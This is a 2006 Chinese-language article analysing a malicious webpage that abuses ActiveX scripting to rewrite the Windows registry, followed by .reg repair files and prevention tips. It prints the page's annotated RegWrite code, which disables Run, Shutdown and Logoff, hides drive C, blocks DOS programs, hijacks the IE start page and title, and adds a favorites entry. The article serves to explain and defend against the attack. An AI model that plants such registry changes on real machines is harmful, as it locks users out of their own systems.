瀏覽網(wǎng)頁(yè)注冊(cè)表被修改之迷及解決辦法

更新時(shí)間：2006年10月23日 00:00:00 作者：

　　瀏覽網(wǎng)頁(yè)會(huì)被修改注冊(cè)表？千真萬(wàn)確！如果你去瀏覽過(guò)下面的網(wǎng)頁(yè)：http://www.某某.com/default.htm ，你真有生不如死的感覺(jué)！

進(jìn)入該網(wǎng)頁(yè)會(huì)被：

　　1.修改開(kāi)始菜單

　　1）禁止“關(guān)閉系統(tǒng)”
　　2）禁止“運(yùn)行”
　　3）禁止“注銷(xiāo)”

　　2.隱藏C盤(pán)——你的C盤(pán)找不到了

　　3.禁止使用注冊(cè)表編輯器regedit

　　4.禁止使用DOS程序

　　5.使系統(tǒng)無(wú)法進(jìn)入“實(shí)模式”

　　6.禁止運(yùn)行任何程序

　　7.將IE瀏覽器的首頁(yè)改為http://www.某某.com/，收藏夾中也被加入該網(wǎng)址。

　　那么這些功能恐怖的功能是如何實(shí)現(xiàn)的呢？原來(lái)，該網(wǎng)頁(yè)是有人利用Java技術(shù)制作的含有有害代碼的ActiveX網(wǎng)頁(yè)文件。為讓更多的人了解其危害，我查看了其源代碼，將其主要部分列了出來(lái)，并加了詳細(xì)的注釋?zhuān)ㄎ闹杏小白ⅰ弊值牟糠质俏壹拥淖⑨專(zhuān)?/P>

注：下面代碼是將你的IE默認(rèn)連接首頁(yè)改為http://www.某某.com/
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Start Page", "http://www.某某.com/"）;

注：以下是該網(wǎng)頁(yè)修改受害者的注冊(cè)表項(xiàng)所用的招數(shù)

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）;
注：使受害者系統(tǒng)沒(méi)有“運(yùn)行”項(xiàng)，這樣用戶(hù)就不能通過(guò)注冊(cè)表編輯器來(lái)修改該有害網(wǎng)頁(yè)對(duì)系統(tǒng)注冊(cè)表的修改。

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoClose", 01, "REG_BINARY"）;
注：使受害者系統(tǒng)沒(méi)有“關(guān)閉系統(tǒng)”項(xiàng)

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）;
注：使受害者系統(tǒng)沒(méi)有“注銷(xiāo)”項(xiàng)

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）;
注：使受害者系統(tǒng)沒(méi)有邏輯驅(qū)動(dòng)器C

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\WinOldApp\\ Disabled","REG_BINARY"）;
注：禁止運(yùn)行所有的DOS應(yīng)用程序；

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）;
注：使系統(tǒng)不能啟動(dòng)到“實(shí)模式”（傳統(tǒng)的DOS模式）下；

又注：進(jìn)入該網(wǎng)頁(yè)，它還會(huì)修改以下的注冊(cè)表項(xiàng)，使WINDOWS系統(tǒng)登錄時(shí)顯示一個(gè)登錄窗口（在MicroSoft網(wǎng)絡(luò)用戶(hù)登錄之前）

Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeCaption", "嗚啦啦..."）;
注：這些代碼會(huì)使窗口的標(biāo)題是“嗚啦啦…”

Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeText", "歡迎你！你這個(gè)超級(jí)無(wú)敵大白癡！《嗚啦啦...》故事開(kāi)始了，按確定進(jìn)入悲慘世界"）;
注：上面一行是會(huì)在窗口中顯示出來(lái)的文字

注：下面兩行代碼修改注冊(cè)表，使受害者所有的IE窗口都加上以下的標(biāo)題：“嗚啦啦…”

Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "嗚啦啦..."）;
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "嗚啦啦..."）;
注：到上面一行為止，完成了對(duì)受害者的注冊(cè)表的所有修改！

注：下面代碼用來(lái)將其網(wǎng)頁(yè)增加到受害者的收藏夾中

var WF, Shor, loc;
WF = FSO.GetSpecialFolder（0）;
loc = WF + "\\Favorites";
if（!FSO.FolderExists（loc））
{
loc = FSO.GetDriveName（WF） + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if（!FSO.FolderExists（loc））
{
return;
}
}

注：下面就是使其網(wǎng)頁(yè)加入到你的收藏夾的具體代碼
AddFavLnk（loc, "找到感覺(jué)www.某某.com", "http://www.某某.com"）;

　　由于代碼很簡(jiǎn)單，又加了注釋?zhuān)嘈拍阋呀?jīng)看明白是怎么回事了。那么如果不小心進(jìn)入該網(wǎng)頁(yè)，并且已經(jīng)中招了該怎么辦呢？別急，下面給你列出了解決的辦法。

受害用戶(hù)的修復(fù)方法：

　　1：對(duì)于Win9x用戶(hù)，建議在電腦啟動(dòng)時(shí)按F8鍵，選擇到MS-DOS方式下，使用Scanreg/restore命令來(lái)恢復(fù)以前備份的、正常的注冊(cè)表。

　　2：對(duì)于Win2000用戶(hù)，把以下內(nèi)容copy下來(lái)，存為unlock.reg文件，選帶命令行的安全模式，用命令regedit unlock.reg導(dǎo)入，如何重啟機(jī)器就OK了。

unlock.reg文件內(nèi)容如下：

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"Disabled"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"

預(yù)防辦法：

　　1.要避免中招，關(guān)鍵是不要輕易去一些自己并不了解的站點(diǎn)。

　　2.在IE設(shè)置中將ActiveX插件和控件、Java腳本等全部禁止

　　3.可以通過(guò)升級(jí)到最新的病毒庫(kù)，來(lái)預(yù)防該類(lèi)惡意網(wǎng)頁(yè)的侵害。

　　4.既然該網(wǎng)頁(yè)是通過(guò)修改注冊(cè)表來(lái)破壞我們的系統(tǒng)，那么我們可以事先把注冊(cè)表加鎖：禁止修改注冊(cè)表，這樣就可以達(dá)到預(yù)防的目的。不過(guò)，自己要使用注冊(cè)表編輯器regedit.exe該怎么辦呢？因此我們還要在此前事先準(zhǔn)備一把“鑰匙”，以便打開(kāi)這把“鎖”！

　　加鎖方法如下：

　　（1）運(yùn)行注冊(cè)表編輯器regedit.exe；
　?。?）展開(kāi)注冊(cè)表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System下，新建一個(gè)名為DisableRegistryTools的DWORD值，并將其值改為“1”，即可禁止使用注冊(cè)表編輯器regedit.exe。

　　解鎖方法如下：

　　用記事本編輯一個(gè)任意名字的.reg文件，比如unlock.reg，內(nèi)容如下：

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

　　存盤(pán)。你就有了一把解鎖的鑰匙了！如果要使用注冊(cè)表編輯器，則雙擊unlock.reg即可。要注意的是，在“REGEDIT4”后面一定要空一行，并且“REGEDIT4”中的“4”和“T”之間一定不能有空格，否則將前功盡棄！

說(shuō)明：對(duì)于“萬(wàn)花谷”網(wǎng)頁(yè)的惡意代碼帶來(lái)的破壞，也可按上面所提的方法來(lái)預(yù)防，中招后也可參考上面的方法解決。另，KV3000對(duì)“萬(wàn)花谷”可完全恢復(fù)，對(duì)本文介紹的網(wǎng)頁(yè)破壞系統(tǒng)現(xiàn)象，則無(wú)法安全恢復(fù)。